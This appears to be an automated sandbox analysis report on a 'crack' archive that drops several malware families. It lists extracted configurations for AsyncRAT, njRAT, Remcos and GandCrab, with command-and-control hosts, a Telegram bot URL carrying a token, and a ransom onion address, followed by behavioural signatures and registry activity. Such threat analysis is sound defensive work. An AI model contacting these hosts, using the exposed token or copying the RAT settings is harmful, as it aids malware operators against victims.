Resubmissions
09-09-2024 23:39
240909-3nkmdswdqm 1009-09-2024 23:31
240909-3hx1jaxfqb 1009-09-2024 23:11
240909-26blrsvfjk 1009-09-2024 22:25
240909-2b33jatcjn 1009-09-2024 22:07
240909-11pe1avbqd 1009-09-2024 21:53
240909-1rxd9asbrr 1009-09-2024 21:44
240909-1ltfeatend 10Analysis
-
max time kernel
208s -
max time network
251s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
09-09-2024 22:07
Static task
static1
Behavioral task
behavioral1
Sample
クラック.zip
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
クラック.exe
Resource
win10v2004-20240802-en
General
-
Target
クラック.zip
-
Size
13.4MB
-
MD5
6c5fc1a3ba386a83c87700f54d62a96f
-
SHA1
a05f08de3e4f218ad2567a2695d0ca500fb48ecf
-
SHA256
67c12eda1cc8358e06ef29eabf1542bf68db9da45df65c52d0ac03246bf75e03
-
SHA512
0a2573e40287c35c5a05c9b84fd5fd41bacc16c1bb565ee823ff6a42610c151f460a4be6d7009f0a70b648234aa998af27769ae667f4649c223c39c07449a098
-
SSDEEP
393216:T0Wxsts7B2+qq0a1n5Gy0vdymghya/2yswYpmTg:wGg1+0a1nYvvJghD/2yMM8
Malware Config
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
njrat
im523
puked
147.185.221.20:47570
20006afb0ec33f2e48c8c1f17d4d3382
-
reg_key
20006afb0ec33f2e48c8c1f17d4d3382
-
splitter
|'|'|
Extracted
remcos
AUGUST CRYPTER TOOLZ GRACE STUB
teamfavour222.ddns.net :6767
odogwuvisual123.duckdns.org:6767
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
-YFLE4M
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
C:\$Recycle.Bin\S-1-5-21-2412658365-3084825385-3340777666-1000\CHVDUEX-DECRYPT.txt
http://gandcrabmfe6mnef.onion/738d9b8193718b55
Extracted
njrat
0.7d
kosomk 555
dovelabobzgnan.ddns.net:5552
a8c0d4cf5cfc2cc1149b5e071c2ab5df
-
reg_key
a8c0d4cf5cfc2cc1149b5e071c2ab5df
-
splitter
|'|'|
Extracted
njrat
0.7d
HacKed
192.168.1.42:5552
bf7b1fe7a7644171a9985ea45221c25c
-
reg_key
bf7b1fe7a7644171a9985ea45221c25c
-
splitter
|'|'|
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Process spawned unexpected child process 64 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4728 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5512 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2860 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3680 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6308 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6484 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6732 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3460 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1020 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1388 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6168 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6940 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6752 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7056 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6848 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6808 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6308 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7532 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7340 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7892 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8064 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6864 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7056 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5496 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7100 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3612 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7192 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7308 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2652 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7556 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5440 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7704 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7424 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7764 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7856 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8000 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3748 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8008 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6520 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6760 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4484 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7176 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7404 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7800 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5916 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7564 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7472 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6412 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7212 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5520 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5916 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6928 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7000 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5104 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4848 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6576 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5172 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7124 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6740 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5928 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3328 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7084 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6764 1376 schtasks.exe 127 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6612 1376 schtasks.exe 127 -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x000400000001eaa5-587.dat family_stormkitty behavioral1/memory/1556-611-0x0000000000EF0000-0x0000000000F22000-memory.dmp family_stormkitty -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x000400000001eaa5-587.dat family_asyncrat -
resource yara_rule behavioral1/files/0x000200000001ea91-577.dat dcrat behavioral1/memory/4412-599-0x0000000000B80000-0x0000000000C56000-memory.dmp dcrat behavioral1/files/0x00020000000224b2-656.dat dcrat behavioral1/memory/5492-668-0x00000000001A0000-0x0000000000276000-memory.dmp dcrat -
pid Process 3020 Powershell.exe 1480 powershell.exe -
Modifies Windows Firewall 2 TTPs 5 IoCs
pid Process 5508 netsh.exe 6824 netsh.exe 6292 netsh.exe 5512 netsh.exe 7440 netsh.exe -
resource yara_rule behavioral1/files/0x000200000002271b-692.dat upx behavioral1/memory/4620-701-0x0000000000400000-0x000000000048A000-memory.dmp upx behavioral1/memory/4620-1054-0x0000000000400000-0x000000000048A000-memory.dmp upx behavioral1/memory/4620-1055-0x0000000000400000-0x000000000048A000-memory.dmp upx behavioral1/memory/4620-1976-0x0000000000400000-0x000000000048A000-memory.dmp upx behavioral1/memory/4620-2172-0x0000000000400000-0x000000000048A000-memory.dmp upx behavioral1/memory/4620-2218-0x0000000000400000-0x000000000048A000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
resource yara_rule behavioral1/files/0x0002000000022ef9-780.dat vmprotect -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe クラック.exe -
Program crash 1 IoCs
pid pid_target Process 7004 6360 WerFault.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language クラック.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 7996 cmd.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Kills process with taskkill 1 IoCs
pid Process 6848 taskkill.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 0100000000000000ffffffff firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\NodeSlot = "11" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "10" firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac04000000c8000000354b179bff40d211a27e00c04fc308710300000080000000354b179bff40d211a27e00c04fc308710200000080000000 firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\SniffedFolderType = "Generic" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\MRUListEx = ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" firefox.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1 = 98003100000000000259b365110050524f4752417e320000800009000400efbe874fdb490259b3652e000000c3040000000001000000000000000000560000000000b72b0d00500072006f006700720061006d002000460069006c0065007300200028007800380036002900000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003700000018000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 firefox.exe -
Runs net.exe
-
